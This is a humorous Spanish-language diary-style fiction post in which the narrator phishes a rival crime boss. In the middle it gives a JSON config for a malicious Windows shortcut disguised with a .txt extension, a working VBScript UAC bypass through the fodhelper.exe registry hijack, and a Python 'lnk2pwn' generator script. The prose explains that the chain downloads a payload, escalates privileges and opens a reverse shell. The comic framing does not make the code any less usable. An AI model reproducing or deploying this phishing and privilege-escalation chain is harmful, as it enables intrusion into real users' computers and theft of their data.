Querido diario…
Los días se han vuelto oscuros; he llegado a pensar que el favor está saliendo demasiado caro.
- Ven - me despertó el sonido del celular - Hum... es de madrugada - No te pregunté, te lo ordené - Dice Waze que tardo 30 minutos - Ve a Polanco, mandaré a mi helicóptero por ti
Mientras viajaba por el cielo de la ciudad me preguntaba por cuanto tiempo resistiría así. No había pasado más de una semana, cuando intentó ofrecerme cualquier cosa que quisiese con tal de irme con ella y dejar a Mom. En forma de broma le pregunté si me cambiaría por Cesar, su lugar teniente y me dejaría a mi; a lo que ella se mofo:
- Cesar es un hombre de negocios, tú sólo eres mi juguete - Hum... entonces creo que debo de rechazar, junto a Mom coordino las operaciones de una H. Organización Turbia e Ilegal - dije con gran presunción - Y es justo por eso que mi único interés es en lo que tus manos suaves pueden hacer; no tienes nada que ofrecer. Cesar me genera más beneficios de lo que tu lograras antes de que alguien te mata un tiro en la cabeza. Así que neneco, deja ya de tonterías y acepta para lo único que me sirves.
He de admitir que eso me había dolido, en el ego. Después de esa noche pensé regresar y coordinar a todo lo que estuviese disponible para olvidarnos del trato, y lanzarme contra ella. Ya vería después los problemas que tenemos; en ese momento lo único que quería demostrarle era que no sabía con quién se estaba metiendo.
Pero.. por desgracia cuando intente hacerlo, un #juevesdealitas se nos cruzó.
Debo de admitir que fue una pésima noche de la cual, básicamente no recuerdo nada. Pero; al despertar, después de que un perro llamado Chisco me babease, pude pensar con mayor claridad.
Ok, a quién quiero engañar. Me la pasé ese día todo el tiempo muerto bajo las cobijas. Pero un día más tarde, entonces si; pude pensar con claridad. Y no sólo eso, sabía que debía de hacer algo para demostrarle a esa mala mujer con quién se estaba metiendo. Pos this one.
Dejaría a un lado la tecnología avanzada, o los tehuacanazos; tendría acceso a toda su operación a través de una de las formas más tontas; todo a propósito con tal de demostrarle en donde se quedaba ella y su GRAN Cesar. ¿Mom?, oh si… probablemente no aprobaría esto; pero… como dicen por allí, más vale pedir perdón que permiso.
Lo que hice fue un simple phishing. No puede haber cosa más humillante que recibir el correo del hijo perdido del principe de Nigeria que a través de Hotmail a buscado a miles de personas, hasta que encuentra un alma caritativa que quiere ayudarle a recuperar su herencia. Para ello, primero programe un pequeño template con JSON, el cual sería utilizado para cargar un short cut. ¿Por qué?, bueno; porque hoy en día Microsoft es demasiado complicado de comprometer por estos métodos debido al UAC; incluso si te consigues a una rusa, rubia, güera, alta y pechugona; que te programe un malware y llegas a conseguir que el usuario sea lo suficientemente ingenuo para dar click en ejecutar la pantalla azul gigante de warning de Windows:
Pues la realidad es que el malware se ejecutaría con privilegios del usuario que este usando esa computadora; lo cual usualmente es un usuario no administrador; que no logrará mucho. Pero, ¿un short cut?, todo mundo los usa y con ellos se puede hacer de todo 😛
Esa fue mi razón, primero que nada preparé el JSON… ¡ah! cierto, también use JSON, porque está de moda, en realidad pudo ser simplemente un TXT 😛
{
"shortcut": {
"target_path": "C:\\Windows\\System32\\cmd.exe",
"working_dir": "C:\\Windows\\System32",
"arguments": "/c notepad.exe",
"icon_path": "C:\\Windows\\System32\\notepad.exe",
"icon_index": null,
"window_style": "MINIMIZED",
"description": "te voy a jackiar maldita",
"fake_extension": ".txt",
"file_name_prefix": "te voy a jackiar maldita"
},
"elevated_uac": {
"file_name": "uac_bypass.vbs",
"cmd": "cmd.exe"
}
}
Básicamente la idea es lanzas un short cut (.ink) que descargue y ejecute un payload, el servidor remoto entrega el payload que tiene como objetivo bypassear la UAC; se ejecuta, cambia las llaves del registro, abre una conexión y lanza una shell inversa.
Si, hasta un con netstat se podrían dar cuenta que estoy dentro; pero justo era lo que quería; ella sabría que no sólo mis dedos sirve para hacerle grita… digo para jugar domino; también sirve para entrar a computadoras ajenas.
El payload es el siguiente:
Const HKEY_CURRENT_USER = &H80000001
Const FodHelperPath = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName = ""
Const DefaultRegKeyValue = "%s"
Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)
Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue
Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False
¿Qué por qué Visual Basic Script?… grr.. .¿ya mencioné que me quiero burlar de ella haciendole quedar en ridículo?
Y finalmente podemos todo junto en nuestro short cut:
import os
import sys
import argparse
from utils.log import Log
from utils.ioutils import IOUtils
from cmd.cmdstrategy import CommandStrategy
from utils.clihelpformatter import CliHelpFormatter
parser = argparse.ArgumentParser(
prog="lnk2pwn.py",
usage="python lnk2pwn.py <options>",
formatter_class=CliHelpFormatter
)
parser.add_argument(
"json_config",
nargs="?",
help="the shortcut json config"
)
parser.add_argument(
"-g",
"--generate",
action="store_true",
help="generates a malicious shortcut file(default is True)"
)
parser.add_argument(
"-c",
"--config-file",
metavar="",
type=argparse.FileType('r'),
help="the shortcut config file"
)
parser.add_argument(
"-o",
"--output-path",
metavar="",
help="the output path"
)
parser.add_argument(
"--version",
action="version",
version=__version__
)
parser.set_defaults(generate=True)
parser.set_defaults(config_file="config.json")
def main(args):
"""
Executes the lnk2pwn cli tool
Parameters
----------
args: Namespace
The cli arguments
"""
try:
executor = CommandStrategy.resolve(args)
executor.execute(args)
sys.stdout.close()
sys.stderr.close()
except KeyError:
parser.print_help(sys.stderr)
sys.exit(1)
except ValueError as error:
Log.error(str(error))
sys.exit(1)
if __name__ == "__main__":
try:
json_config = None
if IOUtils.is_piped_input():
json_config = IOUtils.read_piped_input()
cli_args = parser.parse_args()
cli_args.json_config = cli_args.json_config or json_config
main(cli_args)
except KeyboardInterrupt:
sys.exit(1)
Y lo mandé por correo; y entonces si… me subí a ese helicóptero. Al llegar miré los látigos, el cuero; y ella salir con botas negras.
- Hola - Hola neneco; te quiero de rodillas - Antes de eso, quiero decirte algo - lo dije de la forma más sería que pude - ¿Qué? - Hable con Mom y creo que podría dejarme ir, pero quiere tener una llamada contigo por Gotomeeting - ¿Ahora? - Le dije antes de subir - Bien, pero la veré en la computadora; odio la señal de 4G
Abrió su computadora, intentó ejecutar el link y no le funcionó; se volteó a mirarme y yo lo único que pude hacer fue inhalar lo más profundo que pude y me le fui a comerle la boca. Le dije que después lo vería con Mom.
Después de cuatro horas salí, con el pretexto de fumar un cigarro. Entonces le marqué a Janey.
- ¡Janey! - ¡Belindo! - Dime que si - Cayó - Bien - Oye, pero ¿qué estas haciendo?, dime; eso no se hace; eres un traidor - Luego hablamos de mi calidad moral; en este momento ya pasó lo más importante. Descarga todo lo que puedas - Ya - ¿Ya qué? - Pues ya - ¿Y? - Creo que mejor te vienes... digo, este, creo que mejor le caes - [Inserte emoticón pensante aquí]
Se metió con la persona equivocada.
Querido Diario… tengo una canción en el subconsciente y no me la puedo sacar.
Ajá 😛
